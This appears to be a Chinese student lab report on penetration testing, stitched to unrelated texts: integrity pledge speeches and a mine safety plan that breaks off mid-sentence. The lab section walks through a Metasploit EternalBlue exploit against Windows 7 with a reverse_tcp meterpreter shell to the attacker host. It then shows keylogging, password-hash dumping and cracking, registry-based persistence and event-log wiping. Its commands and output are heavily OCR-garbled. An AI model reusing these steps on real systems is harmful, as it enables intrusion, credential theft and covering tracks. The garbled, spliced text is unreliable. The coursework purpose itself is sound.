信息系统安全测评

渗透攻击工具测试实验目的：掌握渗透攻击工具的工作原理，熟练使用至少一种渗透攻击工具的安装、配置、操作，熟练使用渗透攻击工具。实验内容：（1） 设计并搭建一个实验环境，包含靶机（预置若干安全漏洞或脆弱性）和渗透攻击终端（安装、配置渗透测试攻击工具），渗透测试攻击工具可选，如Metasploit、BurpSuite等；（2） 使用渗透测试攻击工具对靶机进行渗透攻击；（3） 对渗透结果进行分析，并给出加固建议。实验原理渗透测试是指渗透人员在不同的位置（比如从内网、从外网等位置）利用各种手段对某个特定网络进行测试，以期发现和挖掘系统中存在的漏洞，然后输出渗透测试报告并提交给网络所有者。网络所有者根据渗透人员提供的渗透测试报告，可以清晰知晓系统中存在的安全隐患和问题。实验环境攻击机装有Metasploit的ubuntu16.04 32靶机Win7x64 33实验步骤安装最新版Metasploit：命令1：curl/rapid7/metasploi-tomnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb>msfinstall命令2：chmod755msfinstall命令3：./msfinstall（一）网络渗透攻击先用nmap扫描查看靶机开放了那些端口SERVICEmsrpcnetbios-ssnfnicrasott-dsuiiknownunknownunknownunknownunknownunkncmunutikncwnHostisup(Q.0OQG54slatency).Notshown：989closedportsPORTSTATE135/tcpopen139/tcpopen445/Tcpopen19152/tcpopen49153/tcpopen49154/tcpopen19155/tcpcpan49156/tcpopen49157/tcpopen49159/tcpcpen49167/tcpopenSERVICEmsrpcnetbios-ssnfnicrasott-dsuiiknownunknownunknownunknownunknownunkncmunutikncwn'1ACAddress；66:0C:23:E7:58:B4(VMware)円畀>useeKpl0it/u,indows/s[iib/nsJ.7_eie_eternalbluemgfexpLait( )>setpayloadwindows/x64/fieterpreter/reverse_tcppayload->windows/x&4/neterpreter/reverse_tcp曲打exploit{ )asetrhast33rhast=>19Z.168.74.133EEfexploitf )asetIhost32lhast=*192.1&8.74.132Esfexploit( )>exploit[ 1亚.WM.131:445“j192.168,74.133:44533:4455MBV2buffer.-Startingnon-paaedpnnltjrnnmi.no-Sending-ClosingSMBv2SMBvlbuffersconnectiancreatingfreeht?leadjacentta[ 1亚.WM.131:445“j192.168,74.133:44533:4455MBV2buffer.-Startingnon-paaedpnnltjrnnmi.no-Sending-ClosingSMBv2SMBvlbuffersconnectiancreatingfreeht?leadjacentta33:44553:^4533:445192.153.74,133:445*td*\J/illtrL[rLrLD-IL_LS*IBv2buffers.finalIfratjmpntnfpxpl.nitpacket!-Sending-Sending-Receivingresponsefromexploitpacket-ETERNALBLUEoverwriteconpletedsuccessfully(0KCO00000Sendingeggtocorruptedconnection.-Trtagerlngfreeofcorruptedbufferr33:445192.16874.133:445Sendingstage(206403bytes)to33Meterpretersession1opened(32:44^4->33:49161)a[+]33:445WIN-t2018-94-150S：12:07-0799[+J1SZ.168.74.133：445-neterpreter>得到shell（二）后渗透攻击Meterperter是Metasploit框架中通常作为攻击载荷所使用能够返回一个控制通道的模块。在利用ms17-010漏洞拿到shell后可以对目标系统进行更为深入的渗透，包括密码哈希值获取，特权提升、跳板攻击、纯内存工作模式、反追踪等等。①键盘记录：使用keyscan_start命令开启键盘记录在用户登录系统后用keyscan_dump参看可以得到明文密码。②哈希值登录：不使用键盘记录功能可以用Meterperter中的hashdump命令获取系统本地文件中的用户名和密码哈希值。拿到LM，NTLM哈希值后可以在www.objectif-securite.ch/en/ophcrack.php中在线破解，或者直接用windows/smb/psexec传递哈希值进行渗透。meterpreter>hashjun[)Admtnistr^tor:SS0:3jd3b435bE14&^cejad3b435bS1404Ge:31d6cfG®dL6a&931b73cS9d7e0c0g&c0:::C-uest;501:dad3t?^35b51404eecfdJ3b435b51494&&;31dCjLf?0dlCjae931b73C53d7e0C089L0;::GOIsrDri：ia00:a3d3h435b51494&&aad3t-435bS1464Ge:6431afb64Hle&8d5b74a29fl74b3S0c4:::GO64G1afti641d1eeSd5b74a2e374ba50c4Crackingr&suft:zzz321③持久控制：Meterperter仅仅是驻留内存中的shellcode,一旦目标主机重启将失去控制，为此使用Meterperter中persistence、metsvc、getgui等后渗透攻击模块，

nereroreter>runpersistence-u-i5-r192.16B.74.132-p4444[!]fletcrpreterscriptsaredf?precated.Trypost/windoHSnereroreter>runpersistence-u-i5-r192.16B.74.132-p4444[!]fletcrpreterscriptsaredf?precated.Trypost/windoHS丿EBnmgefpe「百[!]txanple:runpQst>indaws/n3riafj?；persi.^renc?_pieOPIK)N=value[…]RunningPersistenceScriptResaurceFLLerorcleanupcreatedat/homc/tsron/.nsf4/LQg5/persi5tcnc&/WIN-0GJVIJPLHBO_20ia0415.3951；UIN-0GJVIJPLHBO_20Jefi^lS.3a51.rc'-]CfedttnaPiiflt)ad=wtfid&iAis/meterpreter/reversetcplhost=19Z.1G8.74.132lport=4444Pcrsistentagentscriptis^3625bytestongj丄]PersistentScriptwrittentaC:\Uindow£\T£MP\TnNFy\/\.|cgn.ubs[T]Executinoscriptc:\winrinm5\rEHP\TRHFywc7an.vbs[+]AgentexecutedwithFID25BBInstallingintoautorunmsHKCU\Software\Mt匚「asoft'ViindoHS、匚LjLfeEit^Erwion'Run'IcOczTGzJgPGH[+JinstalledLntudutcrunasTKt:u^softviare\Nl_L：osoft^wlnduws\CLjr『亡fiE¥ErElon\RLrii\kot/r^£JgPGHfromAppltcattanfromSystem...fromSecurity...〉clearevWiping257fromAppltcattanfromSystem...fromSecurity...〉clearevWiping257recordsWiping7S8records：Niping190recordsneterpreter》al实验故障排除与调试实验总结作为一名新提拔的同志，能在这里发言，我感到非常荣幸。首先，感谢省委、省政府对我们这些新提拔同志的关心、信任和厚爱。在10多年的工作经历中。我深深感受到党风廉政建设工作的重要性。感受到作为一名党员领导干部加强党性修养，做好廉政勤政，永葆共产党员先进性的必要性。在此，我表个态，在今后的工作和生活中，力争做到以下几点：一、注重理念学习、提高党性修养在新的岗位上，我将更加注重学习，尤其是要注重加强理论学习，坚持用正确的思想武装头脑，用科学的理论指导实践。始终做到常修为政之德，常思贪欲之害，常怀律已之心，不断提高自身的党性修养，筑牢思想道德防线，坚持做到讲党性、重品行、作表率。二、坚持廉洁自律，切实勤政为民始终坚持“为民、务实、清廉”。正确行使手中的权力，把权力当作责任。在工作中着重做到以下几点：一是忠。即对党对人民忠诚，对党的事业忠心。二是正。即做到居官无私，坚持原则，秉公执法，一身正气，敢抓敢管。三是勤。即勤勉敬业，务实为民，脚踏实地，埋头苦干，出实招，干实事，鼓实劲，以谋事、干事凝聚力量。四是廉。即严格遵守党纪国法，严格执行《廉政准则》，严把无关，同时，加强对家属、子女和身边工作人员的教育和管理，坚持淡泊名利，廉洁奉公。努力做到不为权利所失，不为人情所诱，不为物欲所惑，始终保持政治上的坚定和思想道德上的纯洁。三、加强廉政建设，认真履行职责一是认真履行“一岗双责”，不断加强队伍廉政建设，把廉政工作和业务工作同部署，同检查，同考核。二是认真抓好队伍的廉政建设。制定完善党风廉政建设制度工作落实到位。三是强化监督和责任追究，对违纪问题，绝不姑息，树立起清蒸廉洁的风气。能够有这样一次机会在这里做表态性发言，接受这样的廉政教育，我们要再次感谢组织的帮助与关怀，今后要自觉的组织的监督和考核。我们应该心怀感恩，“做一个组织和群众信任的人，做一个同事和朋友敬重的人。做一个亲属子女可以引以为荣的人。做一个回顾人生能够问心无愧的人。在新任领导干部集体廉政谈话时的表态发言各位领导，各位同志：今天，省纪委组织新任领导干部集体廉政谈话活动，这是市领导对我们年轻干部关心、爱护的具体体现，也是促进我们始终保持清政廉洁作风、努力当好人民公仆的重要举措。为此，我作表态发言如下：一、加强学习，不断提高思想政治素质。首先，要勤奋学习。牢固树立终身学习的思想，把学习党的方针政策和业务知识作为补充精神食粮，提高思想政治水平和业务工作能力的重要途径。其次，要端正学风，坚持理论联系实际，把理论学习的成果转化为全面建设小康社会、构建社会主义和谐社会的能力。再次要学以致用。通过学习，牢固树立马克思主义的群众观念，坚持心系群众、服务人民、树立正确的人生观、价值观和权力观，时刻摆正自己的位置，在思想感情上贴近群众，关心群众生活，解决群众的实际问题，努力当好人民公仆。二、严肃认真，落实党风廉政责任制。带头落实党风廉政责任制，加强班子的思想政治建设，增强团结、形成合力，充分发挥领导班子集体领导的功能；坚持民主集中制的原则，发扬民主、团结共事，坚持人事、财务、重点工程项目建设等重大问题，一律经党委会集体讨论决定，坚持在集体领导下开展工作，自觉接受党组织和群众的监督；适时开展预防职务犯罪教育，做好水利建设工程领域的反腐败工作，所有水利建设工程，一律实行招投标、项目法人、施工合同、工程监理、竣工验收等制度，加强工程管理，杜绝人情工程。三、严于律已，自学执行各项规章制度。自觉遵守党的纪律和国家的法律、法规，带头执行机关各项规章制度。严格执行党政领导干部廉洁从政的各项规定，坚持原则，秉公办事，决不以手中的权力谋取任何私利；严于利已，宽以待人，坚持与班子成员经常谈心、通气，广泛听取各方面的意见和建议，虚心接受批评意见，不断改进工作作风；牢记“两个务必”，带头发扬艰苦奋斗、勤俭节约的精神，自学抵制享乐主义和奢侈之风，反对铺张浪费；坚持自省、自重、自警、自励，保持高尚的精神追求和健康的生活情趣，自觉抵制各种腐朽的思想观念的侵蚀，真正做到立党为公、执政为民，永葆共产党员的政治本色。同时，要加强对身边工作人员和家属子女的教育，共同遵守社会公德、职业道德、家庭美德，坚持清清白白做人，堂堂正正做官，用好手中的权，管好身边的人，认真做好关乎民生的事，努力当好人民的公仆，为构建和谐社会作出自己应有的贡为全面贯彻落实党和国家安全生产方针政策和法律、法规，深入推进安全生产体系建设，实现全矿安全形势持续稳定发展，现对2022年安全工作作出如下安排：一、总体思路、奋斗目标（一）总体思路。认真贯彻“党政同责、一岗双责、齐守抓共管，守住安全红线”的总体要求，以“零”理念为引领，以体系为统领，以执行国务院《关于进一步加强企业安全生产的通知》为重点，突出综合治理，把握关键环节，强化安全生产基础建设、制度建设、职工队伍建设，严细过程管控，推进科技进步，加强监督检查，严肃考核问责，筑牢安全防线，实现安全形势持续稳定发展。（二）奋斗目标。重、特大人身伤亡事故为“零”。爆炸事故为“零”。重、特大机电设备事故为“零”。火灾事故为“零：。职业病发生率为“零”。轻伤、微伤控制在3%o。全员安全教育培训率为100%。隐患整改合格率100%。二、突出体系统领，构建长效机制（一）强化体系统领。优化顶层设计，从源头上把各项安全工作部署融入到体系及各要素建设之中，把各类安全检查纳入体系考核，真正用体系思考策划，统筹指导、考核落实安全生产工作，提高安全管理的系统性、科学性。（二）落实齐抓共管。进一步完善体系各要素的推进目标推进重点，按照“横到边，纵到底”的原则，将要素推进目标任务及要求分解到矿领导、部门、工段、班组，谁牵头、谁负责、谁落实、谁考核，确保各要素推进到底。（三）突出工作重点。按照“固化、深化、完善、融入、创新”的思路，对体系各子体系、各要素统筹规划、优化完善，明确重点、有序推进；（四）严格检查考核。坚持日常动态检查为主与季度检查相结合、信息化手段与现场检查相结合，考核结果与干部职工的安全奖罚挂钩。并把安全标准化体系作为目标考核评先评优的必备条件，实行安全“一票否决”。三、强化综合治理。严防较大及以上事故（一）强化顶板综合治理。落实顶板分级管理制度，严格执行顶板治理措施；强化采场的顶板管理，对空顶（场）要先打锚杆支护，实行快出快充的原则，严格控制暴露面积，做好敲帮问顶的工作，强制推行后退式打眼，使员工不在不稳定的空顶下作业。强化巷道的施工质量，严打弄虚作假行为，对不稳定的顶板和帮围岩要进行有效的挂网喷浆支护，确保安全生产。（二）加强通风系统管理。抓好通风系统改造优化、报废采区、巷道封闭、通风设施管理、主要通风巷道修复等工作，确保通风系统正规合理、稳定可靠；根据矿井通风系统实际，抓好采区，工作面的正常有序接替，避免采掘生产过于集中，确保同一采区同时作业采掘面符合规定。（三）加强防火、防尘和放炮管理。落实超前预防、综合治理的防火措施，加强炸药库，油库、物资仓库及井下电器设备、绞车房、配电室的管理，防止火灾爆炸事故的发生；严格粉尘属地管理，各中段及施工地段要做好洒水降尘工作，保持湿式作业，并做好个体防护，对不严格执行劳动保护制度的要严格处罚；严格执行“一炮三检”、“三人连锁”、“三警戒”、清底验炮等制度，杜绝放炮事故。（四）强化防治水工作。认真贯彻落实《金属与非金属矿山防治水规定》健全“预测探查、综合治理、效果验证、安全评估”工作体系，对井下出水点要按规定，先探水后施工，建立完善的水文动态观测系统，完善防治水方案和队伍建设，为防治水工作提供保证。（五）严格机电管理。认真落实机电管理规定及机电技术规范，供电系统运行方式、供电线路、电器设备巡检维护及预防性检修试验必须执行公司和矿山有关规定；严格供电系统和各电器设备，漏电保护装置的管理；加强提升系统安全管理，提高日常检查和定期检修质量；特别是刹车系统、液压站、钢丝绳的检验和检测，做好维护保养。加强井下电器管理，井下电器必须纳入单位统一管理，严格实行“工作票”制度，严禁未经业务部门认定的电器设备、材料入井使用，确保井下电器“三大保护”齐全、灵敏、可靠，消灭电器失爆。（六）加强井下安全避险“六大系统”建设和管理，根据国家要求各矿山要建立安全避险“六大系统”，我们要严格按照要求对井下进行“六大系统‘的建设，首先对”“人员定位、通讯联络系统、监测监控系统的建设，使我矿山向数字化矿山迈进，提高安全监测监控能力，将事故隐患控制在萌芽状态；按照“系统可靠、设施完善、管理到位、运行有效”的总体要求，健全管理制度，加强管理维护，强化培训应用，并根据井下采掘系统变化情况及时补充建设完善，提高抵御各种事故和灾害的能力。（七）提高应急救援水平。以防范水、电、顶板、帮围岩机械、火等事故风险为重点，编制完善应急救援预案；强化应急救援知识培训及演练，提高应急处置能力；加强应急救援队伍建设，备齐应急救援物资、器材，确保迅速有效开展应急救援行动。加强主要通道的建设，各中段之间要相互贯通，保证每个中段有第二个通达地面的安全出口，对避灾线路要天天巡查和维护，确保标识清楚、线路通畅。（八）加强重大安措工程、费用项目管理。重大安全投入项目，必须经过安全技术经济一体化论证，做到安全可靠、技术可行、经济合理。列入计划的重大安措项目、技改项目及费用项目，必须按期完成，及时验收，并对实施效果进行评价。（九）加强地面高危行业安全管理。严格执行国家关于民爆、建筑施工、交通运输及消防等安全管理规定和行业标准，健全完善管理体系，提高管理水平；建立地面高危行业安全管理档案，定期开展监督检查、评估和指导服务；强化地面高危行业安全隐患排查整治和重大危险源的监测和评估与监控，超前防范；落实矿井安全管理主体责任；矿山业务部门落实专业职责，加强业务管理和指导。四、加强事故多发易发环节管理、消灭死亡事故（一）进一步加强特殊地段安全管理，对易冒顶塌方、片帮的地段（采场、巷道、斜井）要做到控防结合，严防死守，并要有记录在案，坚持“初撑力、初锚力第一”原则，建立健全顶、地压监测监控管理体系，强化制度落实；积极推广应用超前支护的新工艺，提高支护效果和安全保障水平。（二）严细特殊时期安全管理高度重视节假日、年初岁尾重大活动及安全周期较长、领导班子调整、停产检修期间等特殊时期的安全工作，严格落实领导干部跟带班和值班制度加强安全关键部位、薄弱环节监控。切实抓好冬季“三防”、夏季“三防”工作，全面落实应对各类极端天气的安全防范措施，确保特殊季节安全生产。五、强化“三基”建设，筑牢安全根基（一）抓好工段、班组管理。加强工段长、班组长使用、管理、培训、考核和淘汰工作，着力提高工段长、班组长的综合素质、管理能力和安全责任心；完善工段长、班组长安全管理职责，严格落实工段长、班组长跟班、安全巡查、隐患排查整改等各项管理制度；积极推广先进矿矿山班组建设的管理模式，提升班组安全管理水平，推进安全自主管理。（二）深化安全环境创建。把握安全环境内涵，树立大安全环境创建观。突出安全质量标准化创建，执行国家、自治区安全质量标准化评级办法、基本要求和评分方法，严格按新标准开展达标创建，将安全避险“六大系统”、应急救援、职业病防治、地面设施、综合自动化、可视化等纳入安全质量标准化创建，制定完善创建目标及实施计划，完善创建机制，做到按规范设计、按设计施工、按标准验收；加强组织实施和日常管理，突出过程控制和动态达标，加大动态检查分值权重，杜绝形式主义，提高内在质量。认真开展班组评估、优质工程创建、对标管理，提高创建水平，夯实安全基础。（三）坚持理念渗透、文化育人。强化“零”理念的宣贯，破除“唯条件论”、事故难免论”等观念，牢固树立“只有不到位的管理、没有抓不好的安全”及“安全从我做起、实现零的目标”等安全理念认真学习贯彻“安全生产法”“矿山安全法”“自治区隐患排查条例”“国务院关于进一步加强企业安全生产的通知”，开展“进一步提高各级领导干部安全意识”专项行动，增强干部职工敬畏生命、守护安全的意识。固化班前会、集体升入井制度；加强安全警示教育、亲情教育；充分发挥家属、群众的作用，营造浓厚的安全氛围。（四）强化各类安全培训。健全完善单位主要领导总负责、班子成员“一岗双责”的培训责任体系；严格落实“三项岗位”人员等国家强制培训计划和要求；公司内部各类安全培训必须突出针对性、实效性，强化岗位安全知识操作要领与技能、体系以及新工艺、新技术、新设备等知识学习；健全完善并不断刷新充实试题库，推行培、考相结合和层级抽考，以考促学，营造“乐学、乐训”氛围。（五）严细不安全行为。规范“三违”界定明确“三违”分类完善“三违”申诉、仲裁、帮教等制度；严“三违”查处，重点查处干部违章指挥、严重违反规程和措施规定的行为，对特别严重“三违”人员一律解除劳动合同；强化“三违”成因分析，查找“三违”根源，注重对“三违”人员心理疏导，真正使干部职工不能“三违”、不敢“三违”、不愿“三违”，有效减少和控制“三违”。加强对各种隐患人以及零散作业人员管理，采取积极有效措施进行防控，防止发生意外事故。六、严细过程控制，提高现场安全管理水平（一）加强领导干部下井跟带班管理。 严格执行国务院《关于进一步加强企业安全生产的通知》的要求，矿山领导班子成员、工程师必须下井带班；矿领导带班必须在醒目位置公示；带班领导要认真履行带班职责，着力提高带班质量。各单位要制定完善工区及职能部门跟班管理制度并严格落实。（二） 严细作业现场安全确认。开工前跟班干部、工段、班组长、特殊工种岗位进行准入条件确认；班中跟班干部、班组长进行走动式管理、巡查，职工做好工序转换确认；班后班组长对现场进行班评估，促进现场的过程管控。积极推广先进企业岗位描述、安全确认做法，规范干部职工全过程安全确认。（三） 加强可视化管理。矿井入口、矿仓、采场入口、主要运输巷道必须安装可视化系统，完善管理制度，明确使用责任，严格考核追查；成立矿山调度室对全矿安全生产进行统一调度指挥，安监办要对现场的实时监控、监视；把可视化管理与人员定位系统有机结合起来，切实增强对干部职工的约束力、震慑力，确保现场得到有效管控。七、推进科技进步和装备升级，提高安全保障能力（一） 推进“六化”融合。坚持机械化、后运连续化、可视化、自动化、信息化、安全质量标准化相融合，按照“先进、集成、适用、经济”的原则，提升和加快数字化矿山的建设。达到“无人则安、人少则安”降低事故发生的概率。（二） 加强技术管理。健全技术管理体系、明确职责，规范技术管理流程；有严格方案设计、作业规程、技术措施编制、审批、贯彻、执行；完善各类技术方案、安全措施的逐级备案制，强化跟踪落实；严细技术分析、研究、论证，及时解决重大安全技术问题。（三）严格新工艺、新技术、新产品推广使用管理。鼓励积极推广应用新产品、新技术、新工艺；新产品、新技术、新工艺，必须经过安全技术经济一体化论证，并经评估、试用,经鉴定许可方可推广使用；严禁使用存在安全和质量缺陷的产品、技术和工艺。针对使用过程中存在的问题，及时采取措施整改解决。八、强化安全监管检查指导，严格隐患排查整治（一）加强隐患排查治理。要坚持全员、全方位、全过程开展隐患排查治理，规范安全隐患的排查、记录、汇报、整改、验收考核、统计分析“六步”程序，完善岗位、班组、工段、专业科室、矿部“五级”隐患治理体系。要加强现场安全管理，认真排查治理隐患，重点研究和解决安全生产中出现的重复性隐患。要完善和用好安全信息管理系统，实行“隐患建账、分级管理、闭合运行、跟踪监督”的闭环管理。对查出的隐患要分级分类治理，按“五定五落实”要求整改落实。严格隐患责任追究。坚持“重患必停、重患必究”的原则，对重大隐患除严格按照，《自治区隐患排查条例》规定实施责任追究外，对搁置隐患、重复隐患、反弹隐患和隐瞒隐患，各级领导班子要专题研究，提出处理意见，进行责任追究；对重大隐患实行挂牌督办，对因隐患整改不及时、不